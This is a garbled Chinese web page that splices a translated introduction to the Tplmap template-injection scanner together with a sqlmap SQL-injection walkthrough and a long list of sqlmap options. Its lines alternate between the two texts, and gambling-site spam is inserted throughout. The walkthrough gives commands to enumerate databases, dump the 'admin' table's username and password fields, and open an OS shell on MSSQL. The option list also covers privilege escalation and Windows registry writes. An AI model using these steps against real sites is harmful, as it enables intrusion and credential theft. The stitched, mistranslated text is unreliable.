Menu

Tplmap – 扫描服务器端模板注入漏洞的开源工具



原标题:Tplmap – 扫描服务器端模板注入漏洞的开源工具

1、查询数据

Tplmap是二个python工具,能够经过应用沙箱转义技艺找到代码注入和劳务器端模板注入(SSTI卡塔尔国漏洞。该工具能够在超多模板引擎中选择SSTI来访谈指标文件或操作系统。一些受协理的沙盘引擎包含PHP(代码评估卡塔尔国,Ruby(代码评估卡塔 尔(英语:State of Qatar),Jave(代码评估卡塔 尔(英语:State of Qatar),Python(代码评估卡塔尔,ERB,Jinja2和Tornado。该工具得以施行对这一个模板引擎的盲注入,并有着履行远程命令的力量。

./sqlmap.py -u “ sqlmap
提示 do you want to include all tests for ‘Microsoft SQL Server’
extending provided level (1) and risk (1)? [Y/n]  选 y

安装Tplmap

提醒参数 id 有尾巴,是还是不是要保全其余测量试验,按 y 回车分明 GET parameter ‘id’
is vulnerable. Do you want to keep testing the others (if any)? [澳门新葡8455最新网站,y/N]

澳门新葡8455最新网站 1

获得具有数据库名 因为早就知道数据库名叫微软的 sql
server,为了加紧检测速度,钦赐数据库参数 –dbms=mssql ./sqlmap.py -u
“” –dbms=mssql –dbs

能够通过使用以下github链接从github存款和储蓄Cook隆该工具来设置Tplmap。

日前网页连接数据库名 ./sqlmap.py -u
“” –dbms=mssql
–current-db

git clone

钦命数据库全数表 ./sqlmap.py -u
“” –dbms=mssql –table
-D “testdb”

得逞安装后,将引得路线校勘为tplmap安装文件以运营tplmap.py。

读取钦点表中的字段名 ./sqlmap.py -u
“” –dbms=mssql -D
“testdb” -T “admin” –columns

测量试验Web应用程序中的漏洞

读取内定字段内容 ./sqlmap.py -u
“” –dbms=mssql -D
“testdb” -T “admin” –dump -C “username,password”

Tplmap不独有接受了文件系统的漏洞,并且还大概有着应用差异参数访问底层操作系统的力量。以下显示屏截图展现了可用来访谈操作系统的不等参数选项

2、实践系统命令

澳门新葡8455最新网站 2

./sqlmap.py -u “”
–dbms=mssql –os-shell –threads=10

以下命令可用来测量试验对象UCRUISERL中的易受攻击的参数。

3、平淡无奇参数

./tplmap.py -u <‘指标网站’>

流入点 HTTP 内定诉求方法检验 POST
–data=”password=88952634&rem=on&username=88952634″

实践该命令后,该工具会指向五个插件测量检验目的U路虎极光L以搜寻代码注入机缘。

Cookie –cookie “cookie value” 登入检查测量试验

澳门新葡8455最新网站 3

流入查询数据本领 –technique=U  内定 Union 技能

固然开采破绽,该工具将出口有关指标中可能注入点的详细音信。那个包含GET参数值(无论是id依旧名称卡塔尔国,模板引擎(比方Tornado卡塔尔国,OS(举例Linux卡塔 尔(阿拉伯语:قطر‎和注入技艺(比方渲染,盲卡塔尔。

流入 HTTP 全体办法注入检验 –level3  检验 HTTP
方法深度,GET、POST、Cookie、User-agent 和 Referer

澳门新葡8455最新网站 4

Base64 编码 url 注入点 sqlmap -u
–tamper
base64encode.py

对此易受攻击的目的操作系统,能够使用前面提到的中间一个参数重国民党的新生活运动行tplmap命令。例如,大家能够透过以下措施将-os
-shell选项与tplmap命令一同利用。

检测 DBMS 当前顾客是还是不是 DBA(注入点施行操作系统命令平常须要 DBA 权限卡塔 尔(英语:State of Qatar)–is-dba

./tplmap.py –os-shell -u <‘目的网站’>

不曾询问用户输入,使用具有暗中认可配置 –batch

-os -shell选项在对象操作系统上运转伪终端以施行所需的代码。

私下认可最大线程数为 10 –threads=10

小说出处:latesthackingnews回到天涯论坛,查看更加多

  1. #HiRoot’s Blog  

主要编辑:

 2. Options(选项):  

 3. –version 呈现程序的版本号并脱离 

 4. -h, –help 展现此扶持音讯并退出

  5. -v VERubicon森海塞尔 详细品级:0-6(默以为 1卡塔 尔(英语:State of Qatar)

6.    7. Target(目标): 

 8. 以下起码需求设置此中四个取舍,设置目的 U汉兰达L。

9.   

 10. -d DIRECT 直接连接到数据库。 

 11. -u URL, –url=URL 目标 URL。 

 12. -l LIST 从 Burp 或 WebScarab 代理的日记中分析指标。

  13. -r REQUESTFILE 从四个文本中载入 HTTP 央浼。 

 14. -g GOOGLEDOOdysseyK 管理 Google dork 的结果作为对象 U翼虎L。

  15. -c CONFIGFILE 从 INI 配置文件中加载选项。

16.    

  1. Request(请求)

  2. 这几个采纳能够用来钦定怎么样连接到对象 U翼虎L。

19.   

 20. –data=DATA 通过 POST 发送的数额字符串  

  1. –cookie=COOKIE HTTP Cookie 头 

 22. –cookie-urlencode U本田UR-VL 编码生成的 cookie 注入 

 23. –drop-set-cookie 忽视响应的 Set – Cookie 头新闻 

 24. –user-agent=AGENT 指定 HTTP User – Agent 头 

 25. –random-agent 使用随机选定的 HTTP User – Agent 头

  26. –referer=REFERER 指定 HTTP Referer 头  

  1. –headers=HEADEWranglerS 换行分开,加入此外的 HTTP 头

  28. –auth-type=ATYPE HTTP 身份验证类型(基本,摘要或 NTLM卡塔尔国

(Basic, Digest or NTLM) 

 29. –auth-cred=ACRED HTTP 身份验证凭据(客户名:密码卡塔尔

  30. –auth-cert=ACERT HTTP 认证证书(key_file,cert_file)

  31. –proxy=PROXY 使用 HTTP 代理连接到对象 ULX570L

  1. –proxy-cred=PCRED HTTP 代理身份验证凭据(客户名:密码卡塔尔 

 33. –ignore-proxy 忽略系统默许的 HTTP 代理 

 34. –delay=DELAY 在各种 HTTP 乞求之间的延迟时间,单位为秒 

 35. –timeout=TIMEOUT 等待连接超时的日子(默感到 30 秒卡塔尔国 

 36. –retries=RET奥迪Q5IES 连接超时后再也连接的命宫(暗中认可 3卡塔尔

  37. –scope=SCOPE 从所提供的代办日志中过滤器指标的正则表达式 

 38. –safe-url=SAFUCR-VL 在测量试验进度中日常访谈的 url 地址  

  1. –safe-freq=SAFREQ 四遍访问之间测试央求,给出安全的 UEscortL

40.    41. Optimization(优化):

  42. 那个选拔可用于优化 SqlMap 的属性。

43.   

 44. -o 开启全部优化按键  

 45. –predict-output 预测不足为奇的询问输出

  46. –keep-alive 使用悠久的 HTTP(S卡塔 尔(英语:State of Qatar)连接 

 47. –null-connection 从未有实际的 HTTP 响应体中检索页面长度 

 48. –threads=THREADS 最大的 HTTP(S卡塔 尔(阿拉伯语:قطر‎诉求并发量(默感到 1卡塔尔国

49.    50. Injection(注入):  

 51. 那么些选拔能够用来钦定测验哪些参数, 提供自定义的注入 payloads
和可选窜改脚 本。

52.   

 53. -p TESTPARAMETE帕杰罗 可测量检验的参数(S卡塔 尔(阿拉伯语:قطر‎  

  1. –dbms=DBMS 强制后端的 DBMS 为此值 

 55. –os=OS 强制后端的 DBMS 操作系统为这些值

  1. –prefix=PREFIX 注入 payload 字符串前缀 

 57. –suffix=SUFFIX 注入 payload 字符串后缀  

  1. –tamper=TAMPERubicon 使用给定的本子(S卡塔 尔(阿拉伯语:قطر‎窜改注入数据

59.    60. Detection(检测): 

 61. 那个采纳能够用来钦命在 SQL 盲注时怎么着解析和比较 HTTP
响应页面包车型地铁从头到尾的经过。

62.   

 63. –level=LEVEL 实践测验的阶段(1-5,默以为 1卡塔 尔(英语:State of Qatar)

  64. –risk=科雷傲ISK 实行测验的危机(0-3,默以为 1卡塔 尔(英语:State of Qatar)

 65. –string=ST奇骏ING 查询时有效时在页面相称字符串

  1. –regexp=REGEXP 查询时有效时在页面相配正则表明式 

 67. –text-only 仅依据在文件内容比较网页

68.    69. Techniques(技巧):  

 70. 这么些选取可用以调节具体的 SQL 注入测量检验。

71.    72. –technique=TECH SQL 注入技巧测量检验(私下认可 BEUST卡塔 尔(英语:State of Qatar) 

 73. –time-sec=TIMESEC DBMS 响应的延迟时间(默感到 5 秒卡塔尔 

 74. –union-cols=UCOLS 定列范围用于测量检验 UNION 查询注入  

  1. –union-char=UCHA悍马H2 用于暴力猜解列数的字符

76.    77. Fingerprint(指纹): 

 78. -f, –fingerprint 实行检查广泛的 DBMS 版本指纹

79.    80. Enumeration(枚举):

  81.
这几个选拔能够用来列举后端数据库管理系列的新闻、表中的构造和数量。别的,您
还足以运作您本身

  1. 的 SQL 语句。 

 83. -b, –banner 检索数据库处理连串的标志 

 84. –current-user 检索数据库管理类别当下顾客 

 85. –current-db 检索数据库管理体系当下多少库 

 86. –is-dba 检验 DBMS 当前客户是不是 DBA 

 87. –users 枚举数据库管理种类客商

  88. –passwords 枚举数据库管理种类客商密码哈希 

 89. –privileges 枚举数据库管理种类客商的权杖 

 90. –roles 枚举数据库处理系列客户的剧中人物 

 91. –dbs 枚举数据库处理体周到据库  

 92. –tables 枚举的 DBMS 数据库中的表 

 93. –columns 枚举 DBMS 数据库表列 

 94. –dump 转储数据库管理类别的数据库中的表项  

  1. –dump-all 转储全体的 DBMS 数据库表中的条款 

 96. –search 寻觅列(S卡塔尔,表(S卡塔 尔(英语:State of Qatar)和/或数据库名称(S卡塔尔国

  97. -D DB 要扩充枚举的数据库名  

 98. -T TBL 要拓展枚举的数据库表  

 99. -C COL 要开展枚举的数据库列

  1. -U USETucson 用来展开枚举的数据库客户  

  2. –exclude-sysdbs 枚举表时消亡系统数据库  

  3. –start=LIMITSTART 第多少个查询输出步入检索  

  4. –stop=LIMITSTOP 最终查询的出口步入检索  

  5. –first=FIPAJEROSTCHARAV4 先是个查询输出字的字符检索  

  6. –last=LASTCHALacrosse 最终查询的输出字字符检索  

 106. –sql-query=QUE昂CoraY 要实施的 SQL 语句 

 107. –sql-shell 提示交互式 SQL 的 shell

108.    109. Brute force(蛮力):  

 110. 那么些接纳能够被用来运维蛮力检查。

111.    112. –common-tables 检查存在合作表  

 113. –common-columns 检查存在协同列

114.    115. User-defined function injection(客商自定义函数注入卡塔尔国:

  1. 这几个选拔能够用来成立客户自定义函数。

117.    118. –udf-inject 注入客户自定义函数  

 119. –shared-lib=SHLIB 分享库的地面路线

120.    121. File system access(访谈文件系统卡塔 尔(英语:State of Qatar): 

 122. 这一个选取能够被用于访问后端数据库处理类别的头部文件系统。

123.    124. –file-read=LX570FILE 从后端的数据库管理系统文件系统读取文件 

  1. –file-write=WFILE 编辑后端的数据库管理系统文件系统上的地头文件 
  2. –file-dest=DFILE 后端的数据库管理类别写入文件的相对路线

127.    128. Operating system access(操作系统访谈卡塔 尔(英语:State of Qatar): 

 129. 那几个选拔能够用来访谈后端数据库管理类其余尾部操作系统。

130.    131. –os-cmd=OSCMD 实践操作系统命令  

 132. –os-shell 人机联作式的操作系统的 shell  

 133. –os-pwn 获取七个 OOB shell,meterpreter 或 VNC  

  1. –os-smbrelay 后生可畏键到手叁个 OOB shell,meterpreter 或 VNC

  2. –os-bof 存款和储蓄进度缓冲区溢出利用  

 136. –priv-esc 数据库进度客户权限进步  

 137. –msf-path=MSFPATH Metasploit Framework 本地的设置路径  

  1. –tmp-path=TMPPATH 远程不常文件目录的绝对路线

139.    140. Windows 注册表访谈: 

 141. 那些选拔能够被用于采访后端数据库管理连串 Windows 注册表。

142.    143. –reg-read 读一个 Windows 注册表项值 

  1. –reg-add 写三个 Windows 注册表项值数据  

  2. –reg-del 删除 Windows 注册表键值 

 146. –reg-key=REGKEY Windows 注册表键  

  1. –reg-value=REGVAL Windows 注册表项值  

  2. –reg-data=REGDATA Windows 注册表键值多少  

 149. –reg-type=REGTYPE Windows 注册表项值类型

150.    151. General(一般):

152.    153. 那么些选取可以用来设置有些平时的行事参数。 

  1. -t TRAFFICFILE 记录全数 HTTP 流量到三个文书文件中 

 155. -s SESSIONFILE 保存和回复检索会话文件的具备数据  

  1. –flush-session 刷新当前目的的对话文件 

 157. –fresh-queries 忽略在对话文件中蕴藏的查询结果  

  1. –eta 展现每个输出的预测到达时刻  

 159. –update 更新 SqlMap  160. –save file 保存选项到 INI 配置文件 

 161. –batch 从不询问顾客输入,使用具备默许配置。

162.    163. Miscellaneous(杂项): 

 164. –beep 开采 SQL 注入时提示

  165. –check-payload IDS 对流入 payloads 的检查测量检验测验  

 166. –cleanup SqlMap 具体的 UDF 和表清理 DBMS  

  1. –forms 对目的 U中华VL 的深入分析和测量检验情势 

 168. –gpage=GOOGLEPAGE 从钦赐的页码使用Google dork 结果  

 169. –page-rank 谷歌 dork 结果呈现网页排名(PMurano卡塔 尔(阿拉伯语:قطر‎

  1. –parse-errors 从响应页面深入深入分析数据库管理连串的错误新闻

  171. –replicate 复制转储的数额到叁个 sqlite3 数据库  

 172. –tor 使用暗中认可的 Tor(Vidalia/ Privoxy/ Polipo卡塔尔代理地址  

  1. –wizard 给初级客户的差不离向导分界面
标签:

发表评论

电子邮件地址不会被公开。 必填项已用*标注

相关文章

网站地图xml地图